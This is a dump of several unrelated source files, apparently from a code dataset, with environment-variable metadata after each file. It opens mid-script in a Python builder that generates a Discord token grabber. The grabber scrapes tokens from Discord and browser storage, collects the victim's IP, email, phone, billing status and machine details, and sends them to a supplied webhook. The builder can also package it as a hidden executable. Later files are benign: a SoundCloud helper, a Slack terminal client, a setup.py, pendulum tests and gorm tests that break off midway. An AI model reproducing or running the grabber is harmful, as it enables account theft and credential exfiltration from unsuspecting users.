sys.stdout.write(f"""\r{y}[{b}#{y}]{w} Creating File... {i}""")
sys.stdout.flush()
time.sleep(0.2)
print('\n')
for i in l+l+l+l:
sys.stdout.write(f"""\r{y}[{b}#{y}]{w} Writing File... {i}""")
sys.stdout.flush()
time.sleep(0.2)
os.system('cls')
tokengrabbertitle()
print(f"""{y}[{w}+{y}]{w} Enter the name you want to give to the final file: """)
global filename
fileName = str(input(f"""{y}[{b}#{y}]{w} File name: """))
print(f"""\n\n{y}[{w}+{y}]{w} Enter your WebHook to generate a Token Grabber containing it: """)
global webhooklink
webhooklink = str(input(f"""{y}[{b}#{y}]{w} Webhook Link: """))
print('\n')
spinner()
try:
with open(f"temp/{fileName}.py", "w") as file:
file.write("""import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\\\Discord",
"Discord Canary" : ROAMING + "\\\\discordcanary",
"Discord PTB" : ROAMING + "\\\\discordptb",
"Google Chrome" : LOCAL + "\\\\Google\\\\Chrome\\\\User Data\\\\Default",
"Opera" : ROAMING + "\\\\Opera Software\\\\Opera Stable",
"Brave" : LOCAL + "\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default",
"Yandex" : LOCAL + "\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\\\Local Storage\\\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\\n")[1]
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def main():
cache_path = ROAMING + "\\\\.cache~$"
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\\nPhone: {phone}\\nNitro: {nitro}\\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\\nUsername: {pc_username}\\nPC Name: {pc_name}\\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Grabber",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("~~TOKENURLHERE~~", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
main()""".replace("~~TOKENURLHERE~~", webhooklink))
except Exception as e:
print(f"""\n\n\n\n{y}[{Fore.LIGHTRED_EX }!{y}]{w} Error writing file: {e}""")
os.system(2)
os.system('cls')
main()
print(f"""\n\n\n{y}[{Fore.LIGHTGREEN_EX }!{y}]{w} File has been correctly written to "temp/{fileName}.py" """)
convert = input(f"""\n{y}[{b}#{y}]{w} Convert your script into an executable (Y/N) ? """)
if convert == 'Y' or convert == 'y':
time.sleep(1)
os.system('cls')
print(f'{y}[{b}#{y}]{w} File creation...')
time.sleep(1)
os.system(f"pyinstaller -y -F -w --distpath temp --specpath temp --workpath temp temp/{fileName}.py")
os.system('cls')
print(f'{y}[{b}#{y}]{w} Cleaning up old files...')
time.sleep(1)
os.remove(f"temp/{fileName}.spec")
shutil.rmtree(f"temp/{fileName}")
shutil.rmtree(f"temp/__pycache__")
time.sleep(1)
os.system('cls')
tokengrabbertitle()
print(f"""{y}[{Fore.LIGHTGREEN_EX }!{y}]{w} The executable file has been correctly generated""")
input(f"""{y}[{b}#{y}]{w} Press ENTER to exit""")
else:
input(f"""{y}[{b}#{y}]{w} Press ENTER to exit""")
main()
tokengrabber()
| []
| []
| [
"APPDATA",
"COMPUTERNAME",
"UserName",
"LOCALAPPDATA"
]
| [] | ["APPDATA", "COMPUTERNAME", "UserName", "LOCALAPPDATA"] | python | 4 | 0 | |
core/providers/soundcloud.py | import os
import requests
from bs4 import BeautifulSoup
from core.providers.base import MusicProvider
SOUNDCLOUD_CLIENT_ID = os.environ.get('SOUNDCLOUD_CLIENT_ID')
class SoundCloud(MusicProvider):
NAME = 'SoundCloud'
_MUSIC_URL = 'https://soundcloud.com/{}/{}'
def get_music_name(self, url):
soundcloud_page = requests.get(url)
soup = BeautifulSoup(soundcloud_page.content, 'html.parser')
title_and_artist_tag = soup.find('title')
if title_and_artist_tag:
song_info = title_and_artist_tag.text.split('|')[0]
artist_and_title = song_info.split(' by ')[0]
# it is my observation, could be just some garbage in the name
if len(artist_and_title) > 40:
title = artist_and_title.split(' - ')[1]
return f'{title}'
return f'{artist_and_title}'
def get_music_url(self, name):
api_url = 'https://api-v2.soundcloud.com/search'
params = {
'q': name,
'client_id': SOUNDCLOUD_CLIENT_ID,
'limit': 1,
}
resp = requests.get(url=api_url, params=params)
resp.raise_for_status()
data = resp.json()
user = data['collection'][0]['user']['permalink']
track_link = data['collection'][0]['permalink']
url = self._MUSIC_URL.format(user, track_link)
return url
@classmethod
def is_music_url(self, url):
if 'soundcloud' in url:
return True
return False
| []
| []
| [
"SOUNDCLOUD_CLIENT_ID"
]
| [] | ["SOUNDCLOUD_CLIENT_ID"] | python | 1 | 0 | |
moonsla.go | package main
import (
"fmt"
"log"
"os"
"regexp"
"strconv"
"strings"
"time"
"github.com/logrusorgru/aurora"
"github.com/nlopes/slack"
)
func getChannels(api *slack.Client) (channels map[string]string) {
channels = make(map[string]string)
cursor := ""
for {
chans, newCursor, err := api.GetConversations(&slack.GetConversationsParameters{
Cursor: cursor,
ExcludeArchived: "true",
})
if err != nil {
panic(err)
}
for _, c := range chans {
channels[c.ID] = c.NameNormalized
}
if newCursor == "" {
fmt.Println(newCursor, "exiting")
return
}
cursor = newCursor
}
return
}
func getDMs(api *slack.Client, users map[string]string) (channels map[string]string) {
channels = make(map[string]string)
chans, _ := api.GetIMChannels()
for _, c := range chans {
channels[c.ID] = users[c.User]
}
return channels
}
func getUsers(api *slack.Client) (users map[string]string) {
users = make(map[string]string)
allUsers, _ := api.GetUsers()
for _, u := range allUsers {
users[u.ID] = u.RealName
}
return users
}
func getTimeStamp(ts string) (timeStamp time.Time, err error) {
i, err := strconv.ParseInt(strings.Split(ts, ".")[0], 10, 64)
if err != nil {
return time.Unix(0, 0), err
}
timeStamp = time.Unix(i, 0)
return timeStamp, nil
}
func formatMentions(msg string, users map[string]string) string {
re := regexp.MustCompile("<@U.*?>")
matches := re.FindAllString(msg, -1)
for _, m := range matches {
userID := m[2:(len(m) - 1)]
username, ok := users[userID]
if ok {
username = "@" + username
msg = strings.Replace(msg, m, username, -1)
}
}
return msg
}
func formatUrls(msg string) string {
// Formats slack url into hyperlinks https://gist.github.com/egmontkob/eb114294efbcd5adb1944c9f3cb5feda
// Setting MOONSLA_NO_HYPERLINKS=true will disable this for terminals which don't support it yet.
if os.Getenv("MOONSLA_NO_HYPERLINKS") != "" {
return msg
}
re := regexp.MustCompile("<http.*?>")
matches := re.FindAllString(msg, -1)
for _, m := range matches {
split := strings.Split(m[1:len(m)-1], "|")
// If this is just a plain url continue since we can't format it
if len(split) == 1 {
continue
}
url := split[0 : len(split)-1][0]
title := split[len(split)-1]
formatted := fmt.Sprintf("\x1b]8;;%s\a%s\x1b]8;;\a", url, title)
msg = strings.Replace(msg, m, formatted, -1)
}
return msg
}
func formatAttachments(attachments []slack.Attachment) string {
var messages []string
for _, a := range attachments {
text := a.Text
if a.Title != "" {
text = a.Title + ": " + text
}
messages = append(messages, text)
}
return strings.Join(messages, "\n")
}
func filterChannel(name string, channels map[string]string, whitelist []string, blacklist []string) (whitelisted bool, cName string) {
whitelisted = false
blacklisted := false
cName, ok := channels[name]
if ok {
for _, w := range whitelist {
if cName == w {
whitelisted = true
}
}
for _, w := range blacklist {
if cName == w {
blacklisted = true
}
}
} else {
whitelisted = true
cName = name
}
if len(whitelist) == 1 && whitelist[0] == "" {
whitelisted = true
}
if len(blacklist) == 1 && blacklist[0] == "" {
blacklisted = false
}
if blacklisted {
return false, cName
}
return whitelisted, cName
}
func minInt(a int, b int) int {
if a < b {
return a
}
return b
}
func takeN(text []string, n int) []string {
return text[:minInt(n, len(text))]
}
func trim(text string) string {
splits := strings.Split(text, "\n")
splitted := takeN(splits, 3)
if len(splits) > 3 {
splitted = append(splitted, "...")
}
return strings.Join(splitted, "\n")
}
func main() {
slackToken, ok := os.LookupEnv("SLACK_TOKEN")
if !ok {
fmt.Println("Please set your SLACK_TOKEN")
}
logger := log.New(os.Stdout, "slack-bot: ", log.Lshortfile|log.LstdFlags)
api := slack.New(
slackToken,
slack.OptionDebug(false),
slack.OptionLog(logger))
channels := getChannels(api)
fmt.Printf("Found %v channels\n", len(channels))
users := getUsers(api)
fmt.Printf("Found %v users\n", len(users))
dms := getDMs(api, users)
fmt.Printf("Found %v DMs\n", len(dms))
rtm := api.NewRTM()
go rtm.ManageConnection()
whitelist := strings.Split(strings.TrimSpace(os.Getenv("SLACK_CHANNELS")), ",")
fmt.Printf("Channel whitelist: %v\n", whitelist)
blacklist := strings.Split(strings.TrimSpace(os.Getenv("SLACK_BLACKLIST_CHANNELS")), ",")
fmt.Printf("Channel blacklist: %v\n", blacklist)
for msg := range rtm.IncomingEvents {
switch ev := msg.Data.(type) {
case *slack.MessageEvent:
whitelisted, cName := filterChannel(ev.Channel, channels, whitelist, blacklist)
isDm := false
// Map the users ID to a username if it exists
uName, ok := users[ev.User]
if !ok {
uName = ev.User
}
if ev.Username != "" {
uName = ev.Username
}
dmName, present := dms[ev.Channel]
if present {
cName = dmName
isDm = true
}
t, err := getTimeStamp(ev.EventTimestamp)
timeStamp := "00:00:00"
if err == nil {
timeStamp = fmt.Sprintf("%02d:%02d:%02d", t.Hour(), t.Minute(), t.Second())
}
text := ev.Text
if len(ev.Attachments) > 0 {
text = formatAttachments(ev.Attachments)
}
msg := formatMentions(text, users)
msg = formatUrls(msg)
if !whitelisted {
continue
}
if strings.TrimSpace(msg) == "" {
continue
}
msg = trim(msg)
msgC := aurora.Gray(20, msg)
if isDm {
msgC = aurora.Red(msg)
}
fmt.Printf("%v - %v - %v: %v\n", timeStamp, aurora.Green(cName), aurora.Blue(uName), msgC)
case *slack.RTMError:
fmt.Printf("Error: %s\n", ev.Error())
case *slack.InvalidAuthEvent:
fmt.Printf("Invalid credentials")
return
default:
// Ignore other events..
// fmt.Printf("Unexpected: %v\n", msg.Data)
}
}
}
| [
"\"MOONSLA_NO_HYPERLINKS\"",
"\"SLACK_CHANNELS\"",
"\"SLACK_BLACKLIST_CHANNELS\""
]
| []
| [
"SLACK_BLACKLIST_CHANNELS",
"MOONSLA_NO_HYPERLINKS",
"SLACK_CHANNELS"
]
| [] | ["SLACK_BLACKLIST_CHANNELS", "MOONSLA_NO_HYPERLINKS", "SLACK_CHANNELS"] | go | 3 | 0 | |
libraries/botbuilder-schema/setup.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
from setuptools import setup
NAME = "botbuilder-schema"
VERSION = os.environ["packageVersion"] if "packageVersion" in os.environ else "4.13.0"
REQUIRES = ["msrest==0.6.10"]
root = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(root, "README.rst"), encoding="utf-8") as f:
long_description = f.read()
setup(
name=NAME,
version=VERSION,
description="BotBuilder Schema",
author="Microsoft",
url="https://github.com/Microsoft/botbuilder-python",
keywords=["BotBuilderSchema", "bots", "ai", "botframework", "botbuilder"],
long_description=long_description,
long_description_content_type="text/x-rst",
license="MIT",
install_requires=REQUIRES,
packages=["botbuilder.schema", "botbuilder.schema.teams",],
include_package_data=True,
classifiers=[
"Programming Language :: Python :: 3.7",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Development Status :: 5 - Production/Stable",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
)
| []
| []
| [
"packageVersion"
]
| [] | ["packageVersion"] | python | 1 | 0 | |
tests/datetime/test_comparison.py | from datetime import datetime
import pendulum
import pytz
from ..conftest import assert_datetime
def test_equal_to_true():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo=pendulum.UTC)
assert d2 == d1
assert d3 == d1
def test_equal_to_false():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo=pendulum.UTC)
assert d2 != d1
assert d3 != d1
def test_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 0, tz="America/Vancouver")
d3 = datetime(2000, 1, 1, 12, 0, 0, tzinfo=pendulum.timezone("America/Toronto"))
assert d2 == d1
assert d3 == d1
def test_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, tz="America/Vancouver")
d3 = datetime(2000, 1, 1, tzinfo=pendulum.timezone("America/Toronto"))
assert d2 != d1
assert d3 == d1
def test_not_equal_to_true():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo=pendulum.UTC)
assert d2 != d1
assert d3 != d1
def test_not_equal_to_false():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo=pendulum.UTC)
assert d2 == d1
assert d3 == d1
def test_not_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, tz="America/Vancouver")
d3 = datetime(2000, 1, 1, tzinfo=pendulum.timezone("America/Toronto"))
assert d2 != d1
assert d3 == d1
def test_not_equal_to_none():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
assert d1 != None # noqa
def test_greater_than_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(1999, 12, 31)
d3 = datetime(1999, 12, 31, tzinfo=pendulum.UTC)
assert d1 > d2
assert d1 > d3
def test_greater_than_false():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert not d1 > d2
assert not d1 > d3
def test_greater_than_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz="America/Vancouver")
d3 = pytz.timezone("America/Vancouver").localize(datetime(2000, 1, 1, 8, 59, 59))
assert d1 > d2
assert d1 > d3
def test_greater_than_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz="America/Vancouver")
d3 = pytz.timezone("America/Vancouver").localize(datetime(2000, 1, 1, 9, 0, 1))
assert not d1 > d2
assert not d1 > d3
def test_greater_than_or_equal_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(1999, 12, 31)
d3 = datetime(1999, 12, 31, tzinfo=pendulum.UTC)
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_true_equal():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_false():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert not d1 >= d2
assert not d1 >= d3
def test_greater_than_or_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz="America/Vancouver")
d3 = pytz.timezone("America/Vancouver").localize(datetime(2000, 1, 1, 8, 59, 59))
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz="America/Vancouver")
d3 = pytz.timezone("America/Vancouver").localize(datetime(2000, 1, 1, 9, 0, 1))
assert not d1 >= d2
assert not d1 >= d3
def test_less_than_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert d1 < d2
assert d1 < d3
def test_less_than_false():
d1 = pendulum.datetime(2000, 1, 2)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert not d1 < d2
assert not d1 < d3
def test_less_than_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz="America/Vancouver")
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d3 = pytz.timezone("America/Toronto").localize(datetime(2000, 1, 1, 12, 0, 0))
assert d1 < d2
assert d1 < d3
def test_less_than_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz="America/Vancouver")
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d3 = pytz.timezone("America/Toronto").localize(datetime(2000, 1, 1, 12, 0, 0))
assert not d1 < d2
assert not d1 < d3
def test_less_than_or_equal_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_true_equal():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_false():
d1 = pendulum.datetime(2000, 1, 2)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert not d1 <= d2
assert not d1 <= d3
def test_less_than_or_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz="America/Vancouver")
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d3 = pytz.timezone("America/Toronto").localize(datetime(2000, 1, 1, 12, 0, 0))
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz="America/Vancouver")
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz="America/Toronto")
d3 = pytz.timezone("America/Toronto").localize(datetime(2000, 1, 1, 12, 0, 0))
assert not d1 <= d2
assert not d1 <= d3
def test_is_anniversary():
with pendulum.test(pendulum.now()):
d = pendulum.now()
an_anniversary = d.subtract(years=1)
assert an_anniversary.is_anniversary()
not_an_anniversary = d.subtract(days=1)
assert not not_an_anniversary.is_anniversary()
also_not_an_anniversary = d.add(days=2)
assert not also_not_an_anniversary.is_anniversary()
d1 = pendulum.datetime(1987, 4, 23)
d2 = pendulum.datetime(2014, 9, 26)
d3 = pendulum.datetime(2014, 4, 23)
assert not d2.is_anniversary(d1)
assert d3.is_anniversary(d1)
def test_is_birthday(): # backward compatibility
with pendulum.test(pendulum.now()):
d = pendulum.now()
an_anniversary = d.subtract(years=1)
assert an_anniversary.is_birthday()
not_an_anniversary = d.subtract(days=1)
assert not not_an_anniversary.is_birthday()
also_not_an_anniversary = d.add(days=2)
assert not also_not_an_anniversary.is_birthday()
d1 = pendulum.datetime(1987, 4, 23)
d2 = pendulum.datetime(2014, 9, 26)
d3 = pendulum.datetime(2014, 4, 23)
assert not d2.is_birthday(d1)
assert d3.is_birthday(d1)
def test_closest():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 11, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert closest == dt1
closest = instance.closest(dt2, dt1)
assert closest == dt1
dts = [
pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x)
for x in range(4)
]
closest = instance.closest(*dts)
assert closest == dts[0]
closest = instance.closest(*(dts[::-1]))
assert closest == dts[0]
def test_closest_with_datetime():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = datetime(2015, 5, 28, 11, 0, 0)
dt2 = datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert_datetime(closest, 2015, 5, 28, 11, 0, 0)
dts = [
pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x)
for x in range(4)
]
closest = instance.closest(dt1, dt2, *dts)
assert_datetime(closest, 2015, 5, 28, 11, 0, 0)
def test_closest_with_equals():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert closest == dt1
def test_farthest():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 11, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
farthest = instance.farthest(dt1, dt2)
assert farthest == dt2
farthest = instance.farthest(dt2, dt1)
assert farthest == dt2
dts = [
pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x)
for x in range(4)
]
farthest = instance.farthest(*dts)
assert farthest == dts[-1]
farthest = instance.farthest(*(dts[::-1]))
assert farthest == dts[-1]
f = pendulum.datetime(2010, 1, 1, 0, 0, 0)
assert f == instance.farthest(f, *(dts))
def test_farthest_with_datetime():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = datetime(2015, 5, 28, 11, 0, 0, tzinfo=pendulum.UTC)
dt2 = datetime(2015, 5, 28, 14, 0, 0, tzinfo=pendulum.UTC)
farthest = instance.farthest(dt1, dt2)
assert_datetime(farthest, 2015, 5, 28, 14, 0, 0)
dts = [
pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x)
for x in range(4)
]
farthest = instance.farthest(dt1, dt2, *dts)
assert_datetime(farthest, 2015, 5, 28, 19, 0, 0)
def test_farthest_with_equals():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
farthest = instance.farthest(dt1, dt2)
assert farthest == dt2
dts = [
pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x)
for x in range(4)
]
farthest = instance.farthest(dt1, dt2, *dts)
assert farthest == dts[-1]
def test_is_same_day():
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 29, 12, 0, 0)
dt3 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt4 = datetime(2015, 5, 28, 12, 0, 0, tzinfo=pendulum.UTC)
dt5 = datetime(2015, 5, 29, 12, 0, 0, tzinfo=pendulum.UTC)
assert not dt1.is_same_day(dt2)
assert dt1.is_same_day(dt3)
assert dt1.is_same_day(dt4)
assert not dt1.is_same_day(dt5)
def test_comparison_to_unsupported():
dt1 = pendulum.now()
assert dt1 != "test"
assert dt1 not in ["test"]
| []
| []
| []
| [] | [] | python | null | null | null |
vendor/github.com/jinzhu/gorm/preload_test.go | package gorm_test
import (
"database/sql"
"encoding/json"
"os"
"reflect"
"testing"
"github.com/jinzhu/gorm"
)
func getPreloadUser(name string) *User {
return getPreparedUser(name, "Preload")
}
func checkUserHasPreloadData(user User, t *testing.T) {
u := getPreloadUser(user.Name)
if user.BillingAddress.Address1 != u.BillingAddress.Address1 {
t.Error("Failed to preload user's BillingAddress")
}
if user.ShippingAddress.Address1 != u.ShippingAddress.Address1 {
t.Error("Failed to preload user's ShippingAddress")
}
if user.CreditCard.Number != u.CreditCard.Number {
t.Error("Failed to preload user's CreditCard")
}
if user.Company.Name != u.Company.Name {
t.Error("Failed to preload user's Company")
}
if len(user.Emails) != len(u.Emails) {
t.Error("Failed to preload user's Emails")
} else {
var found int
for _, e1 := range u.Emails {
for _, e2 := range user.Emails {
if e1.Email == e2.Email {
found++
break
}
}
}
if found != len(u.Emails) {
t.Error("Failed to preload user's email details")
}
}
}
func TestPreload(t *testing.T) {
user1 := getPreloadUser("user1")
DB.Save(user1)
preloadDB := DB.Where("role = ?", "Preload").Preload("BillingAddress").Preload("ShippingAddress").
Preload("CreditCard").Preload("Emails").Preload("Company")
var user User
preloadDB.Find(&user)
checkUserHasPreloadData(user, t)
user2 := getPreloadUser("user2")
DB.Save(user2)
user3 := getPreloadUser("user3")
DB.Save(user3)
var users []User
preloadDB.Find(&users)
for _, user := range users {
checkUserHasPreloadData(user, t)
}
var users2 []*User
preloadDB.Find(&users2)
for _, user := range users2 {
checkUserHasPreloadData(*user, t)
}
var users3 []*User
preloadDB.Preload("Emails", "email = ?", user3.Emails[0].Email).Find(&users3)
for _, user := range users3 {
if user.Name == user3.Name {
if len(user.Emails) != 1 {
t.Errorf("should only preload one emails for user3 when with condition")
}
} else if len(user.Emails) != 0 {
t.Errorf("should not preload any emails for other users when with condition")
} else if user.Emails == nil {
t.Errorf("should return an empty slice to indicate zero results")
}
}
}
func TestAutoPreload(t *testing.T) {
user1 := getPreloadUser("auto_user1")
DB.Save(user1)
preloadDB := DB.Set("gorm:auto_preload", true).Where("role = ?", "Preload")
var user User
preloadDB.Find(&user)
checkUserHasPreloadData(user, t)
user2 := getPreloadUser("auto_user2")
DB.Save(user2)
var users []User
preloadDB.Find(&users)
for _, user := range users {
checkUserHasPreloadData(user, t)
}
var users2 []*User
preloadDB.Find(&users2)
for _, user := range users2 {
checkUserHasPreloadData(*user, t)
}
}
func TestAutoPreloadFalseDoesntPreload(t *testing.T) {
user1 := getPreloadUser("auto_user1")
DB.Save(user1)
preloadDB := DB.Set("gorm:auto_preload", false).Where("role = ?", "Preload")
var user User
preloadDB.Find(&user)
if user.BillingAddress.Address1 != "" {
t.Error("AutoPreload was set to fasle, but still fetched data")
}
user2 := getPreloadUser("auto_user2")
DB.Save(user2)
var users []User
preloadDB.Find(&users)
for _, user := range users {
if user.BillingAddress.Address1 != "" {
t.Error("AutoPreload was set to fasle, but still fetched data")
}
}
}
func TestNestedPreload1(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1 Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2 Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
